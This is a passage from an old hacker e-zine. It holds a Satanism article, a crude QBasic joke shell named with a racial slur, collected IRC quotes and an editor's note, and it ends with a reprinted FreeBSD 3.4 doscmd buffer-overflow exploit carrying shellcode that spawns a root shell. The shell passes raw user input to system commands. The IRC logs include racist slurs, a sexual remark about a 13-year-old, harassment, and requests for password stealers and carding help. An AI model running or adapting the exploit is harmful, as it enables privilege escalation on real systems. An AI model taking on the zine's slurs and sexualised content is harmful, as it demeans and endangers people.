      to behave and act. I will now take up "The Nine Satanic Statements", 
      "The Eleven Satanic Rules of the Earth" and "The Nine Satanic Sins". 
      When you have read these, and if you still are interested in being a 
      Satanist, buy the Satanic Bible and visit 
      http://www.churchofsatan.com, as mentioned somewhere above.
      Okay, here we go:
      
      The Nine Satanic Statements
      from The Satanic Bible by LaVey
      
      
      1. Satan represents indulgence instead of abstinence!
      
      2. Satan represents vital existence instead of spiritual pipe dreams!
      
      3. Satan represents undefiled wisdom instead of hypocritical self-
      deceit!
      
      4. Satan represents kindness to those who deserve it instead of love 
      wasted on ingrates!
      
      5. Satan represents vengeance instead of turning the other cheek!
      
      6. Satan represents responsibility to the responsible instead of 
      concern for psychic vampires!
      
      7. Satan represents man as just another animal, sometimes better, more 
      often worse than those that walk on all fours, who, because of his 
      "divine spiritual and intellectual development," has become the most 
      vicious animal of all!
      
      8. Satan represents all of the so-called sins, as they all lead to 
      physical, mental, or emotional gratification!
      
      9. Satan has been the best friend the Church has ever had, as He has 
      kept it in business all these years!
      
      The Eleven Satanic Rules of the Earth
      by LaVey
      
      1. Do not give opinions or advice unless you are asked.
      
      2. Do not tell your troubles to others unless you are sure they want 
      to hear them.
      
      3. When in another`s lair, show him respect or else do not go there.
      
      4. If a guest in your lair annoys you, treat him cruelly and without 
      mercy.
      
      5. Do not make sexual advances unless you are given the mating signal.
      
      6. Do not take that which does not belong to you unless it is a burden 
      to the other person and he cries out to be relieved.
      
      7. Acknowledge the power of magic if you have employed it successfully 
      to obtain your desires. If you deny the power of magic after having 
      called upon it with success, you will lose all you have obtained.
      
      8. Do not complain about anything to which you need not subject 
      yourself.
      
      9. Do not harm little children.
      
      10. Do not kill non-human animals unless you are attacked or for 
      your food.
      
      11. When walking in open territory, bother no one. If someone bothers 
      you, ask him to stop. If he does not stop, destroy him.
      
      
      The Nine Satanic Sins
      by LaVey
      
      1. Stupidity - The top of the list for Satanic sins. The Cardinal Sin 
      of Satanism. It`s too bad stupidity isn`t painful. Ignorance is one 
      thing, but our society thrives increasingly on stupidity. It depends 
      on people going along with whatever they are told. The media promotes 
      a cultivated stupidity as a posture that is not only acceptable but 
      laudable. Satanists must learn to see through the tricks and cannot 
      afford to be stupid.
      
      2. Pretentiousness - Empty posturing can be most irritating and isn`t 
      applying the cardinal rules of Lesser Magic. On equal footing with 
      stupidity for what keeps the money in circulation these days. 
      Everyone`s made to feel like a big shot, whether they can come up with 
      the goods or not.
      
      3. Solipsism - Can be very dangerous for Satanists. Projecting your 
      reactions, responses and sensibilities 
      onto someone who is probably far less attuned than you are. It is the 
      mistake of expecting people to give you the same consideration, 
      courtesy and respect that you naturally give them. They won`t. 
      Instead, Satanists must strive to apply the dictum of "Do unto others 
      as they do unto you." It`s work for most of us and requires constant 
      vigilance lest you slip into a comfortable illusion of everyone being 
      like you. As has been said, certain utopias would be ideal in a nation 
      of philosophers, but unfortunately (or perhaps fortunately, from a 
      Machiavellian standpoint) we are far from that point.
      
      4. Self-deceit - It`s in the "Nine Satanic Statements" but deserves to 
      be repeated here. Another cardinal sin. We must not pay homage to any 
      of the sacred cows presented to us, including the roles we are 
      expected to play ourselves. The only time self-deceit should be 
      entered into is when it`s fun, and with awareness. But then, it`s not 
      self-deceit!
      
      5. Herd Conformity - That`s obvious from a Satanic stance. It`s all 
      right to conform to a person`s wishes, if it ultimately benefits you. 
      But only fools follow along with the herd, letting an impersonal 
      entity dictate to you. The key is to choose a master wisely instead of 
      being enslaved by the whims of the many.
      
      6. Lack of Perspective - Again, this one can lead to a lot of pain for 
      a Satanist. You must never lose sight of who and what you are, and 
      what a threat you can be, by your very existence. We are making 
      history right now, every day. Always keep the wider historical and 
      social picture in mind. That is an important key to both Lesser and 
      Greater Magic. See the patterns and fit things together as you want 
      the pieces to fall into place. Do not be swayed by herd constraints - 
      know that you are working on another level entirely from the rest of 
      the world.
      
      7. Forgetfulness of Past Orthodoxies - Be aware that this is one of 
      the keys to brainwashing people into accepting something new and 
      different, when in reality it`s something that was once widely 
      accepted but is now presented in a new package. We are expected to 
      rave about the genius of the creator and forget the original. This 
      makes for a disposable society.
      
      8. Counterproductive Pride - That first word is important. Pride is 
      great up to the point you begin to throw out the baby with the 
      bathwater. The rule of Satanism is: if it works for you, great. When 
      it stops working for you, when you have painted yourself into a corner 
      and the only way out is to say, I`m sorry, I made a mistake, I wish we 
      could compromise somehow, then do it.
      
      9. Lack of Aesthetics - This is the physical application of the 
      Balance Factor. Aesthetics is important in Lesser Magic and should 
      be cultivated. It is obvious that no one can collect any money off 
      classical standards of beauty and form most of the time so they are 
      discouraged in a consumer society, but an eye for beauty, for balance, 
      is an essential Satanic tool and must be applied for greatest magical 
      effectiveness. It`s not what`s supposed to be pleasing - it`s what is. 
      Aesthetics is a personal thing, reflective of one`s own nature, but 
      there are universally pleasing and harmonious configurations that 
      should not be denied.
      
      ----------------------------------------------------------------------
      
      
      Okay, I was planning to do a little satanic history here, but I won`t.
       I`m tired of writing this article, but I hope you read it and found 
      at least some of it interesting, or even better, got provoked by it.
      
      Vegtam
      february 2000
      
      
      
      
      000           00000               000     00  00        00000      000
      000          0000000              000     00  00      00000000     000
      000         000000000             000    000  00     000    000    000
      000  00     000  0000             000  00000000000  000   0  000   000
      000 0000   0000   000   00000000  000 000000000000  00  00000000   000
      000000000  0000   000  000000000  000 000000000000 000 0000000 00  000
      0000000000 0000   000 0000  0000  000    00  00    00 000  000 00  000
      000   0000 0000   000 0000  0000  000   000  00    00 000  000 00  000
      000   0000 0000   000 000   0000  000   000  00    00 000  000 00  000
      000   0000 0000   000 000   0000  000 00000000000  00 000  000 00  000
      000   0000 0000   000 000   0000  00  00000000000  00 000  000 00  00 
      000   0000 0000   000 0000 00000        00  00     000 0000000000     
      00000000   0000000000  000000000  000  000  00      00 000000000   000
      00000000    00000000   000000000  000  000 000      000 00 00000   000
       000000      000000     000 0000  000  00  00        000           000
                                  0000                       00000000       
                             000000000                        000000        
                             000000000                                      
                             00000000
      
      
      
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      [ b0g article # 9 :::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ ::::::::::::::: Negr/OS - dialect - dialect@home.com ::::::::::::: ]
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      
      [ note from the editor, sorry about messing up the appearance of your 
      leet ascii :( ]
      
      
      Negr/OS is the latest underground news since phf baby! Elitely and 
      stably coded in one of today's most widely used and trusted languages,
      Qbasic. Yep! That's right. Placing youz in total fear mode is our 
      ob-jec-tive here at stupidphat.
      Latest kernel build out now is kernel 3.1.3.3.7
      Source is freely distributed so have fun messing with it. To 
      successfully run negr/OS you need QBASIC. If you don't have it you 
      could download QBASIC here: 
      http://dialect.stupidphat.com/qbasic.exe
      
      
      ASM format is available only for the leet++ at:
      http://dialect.stupidphat.com/neg.asm
      
      
      Screenshots of Negr/OS in action can be found here:
      http://dialect.stupidphat.com/neg1.jpg
      http://dialect.stupidphat.com/neg2.jpg
      http://dialect.stupidphat.com/neg3.jpg
      
      
      
      Don't take me wrong. This is all a big joke and I'm not racist 
      (sometimes) and ummmm this project isn't supposed to be all that. I 
      will tell you though that negr/OS DOES WORK. It's not really an os, 
      just a dos shell, but the name fit well :D
      
      
      
      
      REM **** negr/OS ******
      REM Kernel    3.1.3.3.7
      REM **** dialect ******
      
      DIM login$
      DIM pw$
      DIM prompt$
      DIM dir$
      DIM rm$
      DIM host$
      DIM yourmoma$
      REM no_need_to_DIM_anything$
      
      
      CLS
              COLOR 10
              SCREEN 12
      PRINT " "
      PRINT " "
      PRINT "    NNN    NNNN                                 //// OOOOOOOOOOO SSSSSSSSSSS"
      PRINT "    NNNN   NNNN                                ////  OOOOOOOOOOO SSSSSSSSSSS"
      PRINT "    NNNNN  NNNN                               ////   OOOO   OOOO SSSS"
      PRINT "    NNNNNN NNNN eeeeeeee gggggggg rrr rrrr   ////    OOOO   OOOO SSSSSSSSSSS"
      PRINT "    NNNNNNNNNNN eee  eee ggg  ggg rrrrrrrr  ////     OOOO   OOOO SSSSSSSSSSS"
      PRINT "    NNNN NNNNNN eeeeeeee ggg  ggg rrrr     ////      OOOO   OOOO        SSSS"
      PRINT "    NNNN  NNNNN eee      ggg  ggg rrr     ////       OOOOOOOOOOO SSSSSSSSSSS"
      PRINT "    NNNN    NNN eeeeeeee gggggggg rrr    ////        OOOOOOOOOOO SSSSSSSSSSS"
      PRINT "                              ggg"
      PRINT "                         gggggggg"
      PRINT " "
      PRINT "                         The Black Operating System !"
      
                                                    PRINT
                                                    PRINT
                                                    PRINT
                                                    PRINT
                                                    PRINT
                                                    PRINT
                                                    PRINT
                                                    PRINT
                                                    PRINT
      
            PRINT "(Stupidphat.com) negr/OS (ttyp1) fastlink01"
             
                                              SCREEN 12
            LINE (25, 25)-(52, 67), B
            LINE (214, 234)-(23, 45), B, B
      
              COLOR 3
              PRINT
              SCREEN 12
              PRINT
      
      1       INPUT "login: ", login$
              INPUT "password: ", pw$
      
      
      REM Any login name is accepted; only the hard-coded password is checked
      IF pw$ = "pass" THEN
              PRINT
              COLOR 8
      
              PRINT "Negr/OS  Kernel Build : 3.1.3.3.7. "
              PRINT
              COLOR 3
              PRINT "Logged in as user: ";
              PRINT login$
              PRINT "Your shell is /negros/shells/freshmozzarela&sausage"
              PRINT
              PRINT "# MOTD"
              PRINT "Welcome to Negr/OS ! Type help for commands @#$"; ""
              PRINT
              PRINT
      
      
      
              GOTO 2
                      ELSE
                              PRINT
      COLOR 7
              PRINT "Invalid username or password"
              PRINT
              COLOR 3
              GOTO 1
              END IF
      2       PRINT "[";
              COLOR 4
              PRINT login$;
              COLOR 3
              PRINT "@";
              INPUT "negr/OS ]> ", sysprompt$
             
      IF sysprompt$ = "adduser" THEN
              INPUT "Enter the new user name :", user$
              INPUT "Enter a password :", pass1$
              INPUT "Re-Enter the password : ", pass2$
              REM Only touch the user file when adduser was actually requested
              IF pass1$ = pass2$ THEN
                      REM OUTPUT mode overwrites usrs.txt; the password is stored in clear text
                      OPEN "usrs.txt" FOR OUTPUT AS #1
                      PRINT #1, "Username : " + user$
                      PRINT #1, "Password : " + pass1$
                      CLOSE #1
              ELSE
                      PRINT "Passwords did not match"
              END IF
              GOTO 2
      END IF
      
      
      IF sysprompt$ = "dir /w" THEN
              SHELL "dir /w"
              GOTO 2
      END IF
      
      IF sysprompt$ = "dir /p" THEN
              SHELL "dir /p"
              GOTO 2
      END IF
      
      
      IF sysprompt$ = "rm" THEN
              PRINT
              COLOR 9
              INPUT "[RM File] ", rm$
              SHELL "del " + rm$
              COLOR 3
      GOTO 2
      END IF
      
      IF sysprompt$ = "" THEN
      GOTO 2
      END IF
      
      IF sysprompt$ = "cls" THEN
              SHELL "cls"
              GOTO 2
      END IF
      
      
      IF sysprompt$ = "clear" THEN
              SHELL "cls"
              GOTO 2
      END IF
      
      
      IF sysprompt$ = "ver" THEN
              PRINT
              
      COLOR 10
      PRINT "Negr/OS Version 3.1.3.3.7 and dont ever forget it!"
      PRINT
      COLOR 3
      GOTO 2
      END IF
      
      
      IF sysprompt$ = "fdisk" THEN
      SHELL "c:\windows\system\fdisk.com"
      GOTO 2
      END IF
      
      
      IF sysprompt$ = "ping" THEN
      PRINT
      COLOR 9
      INPUT "[Ping target] ", host$
      SHELL "ping " + host$
      COLOR 3
      GOTO 2
      END IF
      
      IF sysprompt$ = "help" THEN
      PRINT
      COLOR 12
      PRINT "cd       help    rm      ver     who     dir     "
      PRINT "hello.c  cd ..   a:      pwd     rm -rf  logout  "
      PRINT "exit     time    txt     c:      hi      Unix    "
      PRINT "cls      clear   fdisk   ping    adduser dir /w/p"
      PRINT
      COLOR 3
      GOTO 2
      END IF
      
      
      IF sysprompt$ = "cd" THEN
      PRINT
      COLOR 9
      INPUT "[ Dir ] ", dir$
      SHELL "cd " + dir$
      COLOR 3
      GOTO 2
      END IF
      
      
      IF sysprompt$ = "pwd" THEN
      SHELL "cd"
      GOTO 2
      END IF
      
      
      IF sysprompt$ = "dir" THEN
              SHELL "dir"
              GOTO 2
      END IF
      
      IF sysprompt$ = "cd .." THEN
              SHELL "cd .."
              GOTO 2
      END IF
      
      IF sysprompt$ = "a:" THEN
              SHELL "a:"
              GOTO 2
      END IF
      
      IF sysprompt$ = "hello.c" THEN
      PRINT
      COLOR 8
      PRINT
      PRINT "HELLO WORLD #@$@#$! "
      PRINT
      COLOR 3
      GOTO 2
      END IF
      
      IF sysprompt$ = "rm -rf" THEN
      PRINT
      
      COLOR 8
      PRINT
      PRINT " j00 fucking mor0n !"
      PRINT
      COLOR 3
      GOTO 2
      END IF
      
      
      
      IF sysprompt$ = "logout" THEN
              CLS
              GOTO 1
      END IF
      
      IF sysprompt$ = "exit" THEN
              END
      END IF
      
      IF sysprompt$ = "who" THEN
              PRINT
              COLOR 4
              PRINT login$
              PRINT
              COLOR 3
              GOTO 2
      END IF
      
      IF sysprompt$ = "time" THEN
              SHELL "time"
              PRINT
              GOTO 2
      END IF
      
      IF sysprompt$ = "c:" THEN
              SHELL "c:"
              PRINT
              GOTO 2
      END IF
      
      IF sysprompt$ = "ls" THEN
              PRINT
              COLOR 15
              PRINT "best step !$# : try dir instead : neener neener.";
              PRINT
              COLOR 3
              PRINT "."
              GOTO 2
      END IF
      
      IF sysprompt$ = "txt" THEN
      PRINT
      COLOR 8
      INPUT "[ TXT ] ", txt$
      SHELL "" + txt$
      COLOR 3
      GOTO 2
      END IF
      
      
      IF sysprompt$ = "hi" THEN
              PRINT "hi"
              ELSE
              PRINT
              COLOR 15
              PRINT ":nigga best recognize : [";
              COLOR 5
              PRINT sysprompt$;
              COLOR 15
              PRINT "] : not a command";
              COLOR 3
              PRINT "."
              PRINT
              GOTO 2
              END IF
      
      IF sysprompt$ = "cd" + dir$ THEN
      PRINT
      COLOR 8
      INPUT "[ Dir ] ", dir$
      SHELL "cd " + dir$
      COLOR 3
      GOTO 2
      END IF
      
      
      
      
      
      
      
      
      
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      [ b0g article # 10 ::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ ::::::::::::::: irc quotes  misc  irc.undernet.org ::::::::::::: ]
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      
      
      
      
      
      <Od1um> prae r u female? or wut?
      
      <BadAssGuy> Hey everyone, I NEED MAJOR HELP! Please, if you know how 
      to lag someone out of any "Microsoft Internet Gaming Zone" game, I 
      WOULD LIKE TO KNOW! Please, I am desperate! Message me, thank you!!!!
      
      <k-rad-bob> the first chick that gave me oral was only 13...she could 
      barely take it n her mouth, i had teethmarks on my penis for a week
      
      <grid> chris`: are you learning disabled by any chance?
      
      <MonkeyPot> you got aol private chat room names?
      
      <m1lk\f00d> twist: will you show her my pic and tell her that i like 
      her, then ask if she could ever love a guy like me
      <Greenie> lol@ me gettin sad and icq'in prae hehe
      <Prae> eh?
      <TwisT> nah bob
      <m1lk\f00d> why not?
      <adam> i got caught by my little sister masterbating to some online     
               porn
      <adam> she said, "what are you doing to that"
      <adam> i said "trying to kill it"
      <adam> and "can you help me"
      <adam> lol
      <adam> doesnt no one care
      <adam> this is child abuse
      <adam> i was only joking
      <adam> geez
      <adam> you really think ?
      <adam> mg
      <adam> issues
      
      [canonbal:#hacktech PING]
      <canonbal> unlagging
      <canonbal> slowly
      <canonbal> heh
      *** canonbal` has quit IRC (Lost irc connection from 207.170.201.226: 
      Broken pipe)
      
      
      <k3rR> hello? Does anyone know anything about earthserv webpage 
      provider i got an account but now it says the site has no dns entry it 
      used to just say page contains no data.does anyone know why or when 
      earthserv will be running again?
      
      <`DS> anybody know where to find violence stats?
      
      <twist182> I JUST WROTE MY FIRST PERL PROGRAM!!!
      <twist182> IM SO FUCKING ELITE
      <twist182> FUCK YOU ALL
      <twist182> HAHAHAHAHAAHHA
      <Prae> splendid james
      <twist182> FUCK YOU ALL!!!!!!!!!!!!!!!!!!!!!!!
      <AlphaTec> uhm...
      <Prae> i wrote my 27th TCL script today
      <ect> lol
      <AlphaTec> hello.pl ?
      <twist182> :(
      <Prae> before you fcrashed me
      <twist182> NO
      <Prae> you twat
      <AlphaTec> oh
      <twist182> its far more k-rad
      * twist182 giggles
      <twist182> prae :(
      <AlphaTec> twist
      <twist182> yeah
      <AlphaTec> what perl book is it?
      <AlphaTec> what one are you reading?
      <Prae> 'perl for canadian fags'
      
      
      <Dr_Pain_>  i need help here about a cble modem to nuke theres a girl 
      who has take my nick and put it on a child porn chan and im unable to 
      nuke that bitch shes on cable im in winshit
      
      <thep0et> bob how come smoking makes me horny? watching people smoke 
      makes me erect, is this a problem?
      
      *** |RAT| has joined #k-rad
      <Prae> did you signup bob?
      <k-rad-bob> yes
      <k-rad-bob> h0h0h0h0h0h
      <Prae> basic?
      <k-rad-bob> MASTER!
      <|RAT|> hmmmmmm
      <Prae> elite!
      <Prae> Vicki is such a sweetie
      <Prae> you'll see
      <k-rad-bob> what about bandwith?
      <|RAT|> Isn't this a hacking channel????
      <Prae> fast
      <k-rad-bob> yes rat
      <Prae> no rat
      <Prae> its a sex channel
      <|RAT|> ooooops
      *** |RAT| has left #k-rad
      <k-rad-bob> its also a sex channel
      <Prae> hahahaha!!!!!!
      
      <sdf> NOONE IS LEAVING THIS CHANNEL WITHOUT A GROUP HUG
      *** sdf was kicked by RLoxley (Too many damn caps!)
      
      *** asmith has joined #hacktech
      <asmith> hi
      <asmith> can somone send me a prog that gets i-net p-words and u-names
      
      <jeczilak> Anyone know where I can get getadmin.exe
      
      <Prae> roses are red and violets are twisted, bend over james cause 
      you're about to get fisted.
      
      <thep0et> alot of black metal bands butt fuck eachother on stage
      
      <snookems> eww this girl at my old highschool once was dared to shove 
      a hotdog intoside herself and she got it like all the way and it broke 
      off. she had to go to the hospital and get it removed. i dunno i felt 
      like sharing that. probably becaus i am in a goofy mood now.
      
      *** twist182 has quit IRC (Excess Flood)
      *** twist182 has joined #hackphreak
      *** twist182 has quit IRC (Excess Flood)
      <RLoxley> twist=0wned
      
      <NazXuL-X> hey.
      <NazXuL-X> i went to mplayer last night. its still gay
      <k-rad-bob> so you blended in quite well?
      
      <k-rad-bob> im having sex with my left hand from now on
      <twist182> prae
      <twist182> bob, why the switch?
      <Prae> !?
      <Prae> im ambedextrus
      <Prae> i use both
      <Prae> :)
      <twist182> i use my feet
      <k-rad-bob> to make my right one jealous so that she'll work way 
      harder when i give her another chance
      
      *** A17mPA has joined #hacktech
      <A17mPA> hi every1. Question. Has anyone heard of something called AOL 
      IM Sysop?
      <A17mPA> or something like that
      
      <jeczilak> How well does getadmin.exe work?
      
      <Shizzy> We need more women in here.. thats the problem in a 
      nutshell... women that aren't to bright so they will go along with 
      anything we say haha
      
      <g-sync> does anybody have a unix i can borrow??????
      
      *** RLoxley has joined #hacktech
      <G0th1c> hey RL
      <RLoxley>  [5m [1;31mh [1;32me [1;34ml [1;33ml [1;31mo [1;32m, 
       [1;34mh [1;33ma [1;31mc [1;32mk [1;34me [1;33mr [1;31ms [0m
      *** RLoxley is now known as grid
      <grid> coOOl i dont feel gay anymore
      <grid> i am cured
      <grid> goodbye for now.
      *** grid has left #hacktech
      *** fraglord has joined #hacktech
      <canonbal> *** RLoxley is now known as grid
      <canonbal> rloxley and grid arent the same ppl are they? Heh
      
      <fraglord> does anyone have a webpage or know of a cool program that 
      hacks ICQ passwords or hotmail passwords
      
      <Uneek> I've got more skills on the tip of my cock then you've got in 
      your whole brain!!!
      
      <h2so4> i havent been afk for like 5 days
      
      *** thep0et has Quit IRC (I'm black and i don't work for a 
      living...are you surprised?)
      
      <niemand1> i find masturbation a good way to make bath's more fun
      
      <vuduisz> they cant talk about security, 2600 dont know shit about 
      security
      
      *** ZeRiAl has joined #hackphreak
      <ZeRiAl> hey you guys, u happen to know of a program to get login and 
      pswd from a porn site?
      
      *** M1K4 has joined #hackuk
      <M1K4> i need some carding instructions
      
      * Prae2k/#k-rad is learning how to masturbate whilst doing a handstand
      * thep0et/#k-rad is learning how to ignore prae's stupid pointless 
      comments which make no sence what so ever
      
      *** alltra has joined #hacktech
      <alltra> anyone know anyhting that will screw someone over real bad if 
      all I have is their ip number?
      
      <thep0et> could you imagine if our penises acted like elephant trunks? 
      and we had to feed our selves like that
      
      *** tobsgal has joined #hackuk
      <tobsgal> any lesbian or bi females want to chat
      
      *** ubre has joined #HackTech
      <ubre> hi, guys pls help. How do i see someone's IP server in a chat?
      
      *** SpeedSwim has joined #HackTech
      <SpeedSwim> hety any of you have a big virus or kno where I cna get 
      one?
      
      *** hey has joined #HackTech
      <hey> is they re somebody who could tell me how to hack  somebody on 
      irc  our can give me a sites????????????????????
      
      <The0ry> without masturbation there is nothing
      <The0ry> sekz, i serioulsy used to masturbate about 15 to 20 times a 
      day
      <The0ry> seriously even
      
      *** thik has joined #hacktech
      <thik> Can anybody show me how to hack ????
      
      *** weesel has joined #hacktech
      <weesel> hello
      <weesel> does anyone know of a proggie that will let me into someones 
      HDD useing ICQ?
      
      *** Drumguy has joined #hacktech
      <Drumguy> Anybody know operatior or administraitor Yahoo Chat 
      commands?
      <Drumguy> Anybody know operatior or administraitor Yahoo Chat 
      commands?
      <Drumguy> Anybody know operatior or administraitor Yahoo Chat 
      commands?
      <Drumguy> Anybody know operatior or administraitor Yahoo Chat 
      commands?
      
      *** Drumguy has joined #hacktech
      <Drumguy> Does anybody know kick certain people out of Yahoo Chat 
      Rooms?
      
      *** moeska has joined #hacktech
      <moeska> can someone tell me how to ping to a specified port?
      
      *** bcsiss has joined #hacktech
      <bcsiss> i need help
      <canonbal> with?
      * fraggy is back: from -(tv)- gone -(10mins 56secs)-
      <bcsiss> is there anyway to hack into someone elses computer through 
      mirc?
      
      *** Killer has joined #hacktech
      <Killer> can someone disconnect a clone of me that has fucked up?
      
      *** Zero|kewl has joined #hacktech
      *** hst has quit IRC (bbl)
      <Zero|kewl> does anybody use wwwhack?
      
      *** Freddo has joined #hacktech
      <Freddo> does anybody know NT hack???
      -X- Ban list updated
      * h420i is away: -(could irc be any more boring?)- since -(23:18)- 
      pager -(on)-
      <Freddo> does anybody know NT hack???
      *** G|GAWH0RE has joined #hacktech
      <fraggy> isn't freddo the guy who gets shot in the movie?
      <Freddo> ???
      <fraggy> n/m
      <rafay> :P
      *** koshie has quit IRC (Ping timeout for 
      koshie[get.your.free.shell.at.shellyeah.org])
      <Freddo> http://www.tuxedo.org/~esr/faqs/hacker-howto.html
      <Freddo> sorry
      <Freddo> wrong paste
      <k-rad-bob> lol
      <fraggy> as opposed to the right paste?
      <k-rad-bob> you nail him fraggy
      <Freddo> does anybody know NT hack???
      <fraggy> eh?
      <Freddo> this is correct
      <rafay> w0rd bob
      <rafay> he is just asking a question
      <rafay> :P
      <k-rad-bob> hehe
      <k-rad-bob> sowwie
      <Freddo> so ... does anybody know NT hack???
      <k-rad-bob> lol
      <k-rad-bob> i cant help myself
      <fraggy> haha
      <fraggy> Freddo, say that again. i crack up everytime i read that
      <|cH|cKeN|> hehe
      <Freddo> ok... does anybody know NT hack???
      
      *** lioufman has joined #hacktech
      <rafay> HEH
      *** cTq has left #hacktech
      * lioufman exei pathei plaka me to <<NiRVaNa 2000b>> by NiRVaNaiR 
      [100% Megali eukolia dike mou]
      
      *** Mike`` has joined #hacktech
      <Mike``> can someone help me with something?
      <k-rad-bob> what is it?
      <Mike``> i got a pw cracker but i can't get it to work
      *** Mike`` was kicked by fraggy ( i got this AOL punter proggie but i 
      don't know how it works....... oh, never mind )
      *** Mike`` has joined #hacktech
      <Mike``> funny??
      <|cH|cKeN|> not really
      <fraggy> yes. very
      <|cH|cKeN|> ur just gay
      
      *** L_Mental has joined #hacktech
      <L_Mental> need to know: are there any binders for exe+image?
      
      *** kingpin1 has joined #hacktech
      <kingpin1>   __              ___    ___              
      <kingpin1>  /\ \            /\_ \  /\_ \             
      <kingpin1>  \ \ \___      __\//\ \ \//\ \     ___    
      <kingpin1>   \ \  _ `\  /'__`\\ \ \  \ \ \   / __`\  
      <kingpin1>    \ \ \ \ \/\  __/ \_\ \_ \_\ \_/\ \L\ \ 
      <kingpin1>     \ \_\ \_\ \____\/\____\/\____\ \____/ 
      <kingpin1>      \/_/\/_/\/____/\/____/\/____/\/___/  
      
      <Prae> hi
      <Prae> can i ask you a few questions?
      <gay18> ok pls
      <Prae> firstly, are you a man or a woman?
      <gay18> man and gay
      <gay18> u
      <Prae> im a man
      <Prae> where do you live?
      <gay18> istanbul
      <Prae> What is the first thing that pops into your head when i say       
               poop?
      <gay18> nothng
      <Prae> nothing?
      <Prae> how do you feel about poop?
      <Prae> do you think its good or bad?
      <gay18> you mean poop musc
      <Prae> no
      <Prae> i mean poop as in shit
      <Prae> the brown stuff that comes from your anus
      <gay18> bad
      <Prae> why is it bad?
      <gay18> you are realy sht
      <Prae> and why is that?
      <Prae> does poopsex.com disgust you?
      <Prae> ok, so.. if i say "I want to poop in your mouth." what does
               that make you feel?
      <Prae> angry?
      <Prae> happy?
      <gay18> pls be nce man chat nce thngok
      <Prae> but i want to know how you feel about poop
      <Prae> please, tell me..
      <gay18> ok pls you dont want to be nce i leave
      <gay18> by
      
      <tress> <GrEEnMK> how can i edit file in unix ?
      <tress> <YoJaUta> with a text editr
      <tress> <YoJaUta> but real men use magnetic tipped needles to directly 
                 write to the hd platter
      <tress> <GrEEnMK> ahh
      <tress> <GrEEnMK> what text editor ?
      
      *** TuCoWS has joined #hacktech
      <TuCoWS> Hi, I trade utilities, nukes, antinukes, viruses, antivirus, 
      trojans, antitrojans, firewalls, antiflood, floods, crackers, antiBO, 
      antiNetbus, manuals on computing in general such as irc, telnet or 
      whatever; if you have any, we trade them by e-mail, not by "dcc 
      send"; I am especially looking for spoofers and patches for windows 
      98; whoever is interested, write like this: /query tucows , and you 
      will find me, thanks
      *** TuCoWS has left #hacktech
      
      <Prae2k> >:\
      <Prae2k> my mouse is fucked up
      <Prae2k> i think its drunk
      <madwill> lol
      * madwill hands praes mouse another beer
      <Prae2k> >:\
      <Prae2k> he had enough
      <Prae2k> i wrote 'CUNT' on it
      <Prae2k> about 6 months ago
      <Prae2k> i can still see it
      
      <mcx^> im sorry for nuking you earlier :(
      <mcx^> EVERYONE
      <pez> its ok, i dont think i was at the computer
      <Sekz> ADSL gets here in 6 months.
      <mcx^> MCX WANTS TO APOLOGIZE FOR HIS NUKING
      
      
      
      
      
      
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      [ b0g article # 11 ::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ ::::::::: notes from the editor  k-rad-bob  808@c2i.net :::::::: ]
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      
      
      AGH!
      So much work. Editing this issue has been hell, but still it has been 
      a joy. Issue two is out and we have proven that we aren't a one time 
      only zine, like *cough* pursuit and *cough* b4b0 and *cough* phrack.
      
      Also the feedback we have been receiving has been nothing less than 
      heartwarming. Now all that is left to be said is: Contribute or die!
      Link our site or die! Mass forward our URL to everyone on your icq, 
      email it to everyone you can, and Spam all the Usenet groups with it!
      
      This issue could be better but due to the fact that our domain is 
      finally up and running we are all excited so here goes nothing.
      
      Official b0g site: http://www.b0g.org
      Contact: irc in #k-rad on undernet
      By email: b0g@b0g.org
      
      Contributions can be sent to contribute@b0g.org
      
      That's all :)
      
      
      
      
      Shouts and hi's go out to all of #k-rad #hacktech #hackuk #whhs and 
      to all the other undernet dogs!
      
      
      @HWA
      
162.0 FreeBSD 3.4-STABLE exploit doscmd.c
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: http://infected.ilm.net:8101/new.htm
      
      /*
      *
      * (c) 1999 babcia padlina ltd. <babunia@freebsd.lublin.pl>
      * FreeBSD 3.4-STABLE /usr/bin/doscmd exploit.
      *
      */
      
      #include <stdio.h>
      #include <sys/param.h>
      #include <sys/stat.h>
      #include <string.h>
      
      #define NOP             0x90
      #define BUFSIZE         1000
      #define ADDRS           1200
      
      long getesp(void)
      {
         __asm__("movl %esp, %eax\n");
      }
      
      int main(argc, argv)
      int argc;
      char **argv;
      {
              char *execshell =
              "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
              "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
              "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
              "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
      
              char *buf, *p;
              int noplen, i, ofs, align;
              long ret, *ap;
              FILE *fp;
      
              if(!(buf = (char *)malloc(BUFSIZE+1)))
              {
                      perror("malloc()");
                      return -1;
              }
      
              if (argc < 3) { fprintf(stderr, "usage: %s ofs align\n", argv[0]); exit(0); }
      
              ofs = atoi(argv[1]);
              align = atoi(argv[2]);
      
              noplen = BUFSIZE - strlen(execshell);
              ret = getesp() + ofs;
      
              memset(buf, NOP, noplen);
              buf[noplen+1] = '\0';
              strcat(buf, execshell);
      
              setenv("EGG", buf, 1);
      
              free(buf);
      
              if(!(buf = (char *)malloc(ADDRS+align+1)))
              {
                      perror("malloc()");
                      return -1;
              }
      
              memset(buf, 'a', align);
      
              p = &buf[align];
              ap = (unsigned long *)p;
      
              for(i = 0; i < ADDRS / 4; i++)
                      *ap++ = ret;
      
              p = (char *)ap;
              *p = '\0';
      
              fprintf(stderr, "ret: 0x%x\n", ret);
      
              execl("/usr/bin/doscmd", "doscmd", buf, 0);
      
              return 0;
      }
      
      
      
      /*           =- passed thru infected network  -=         */
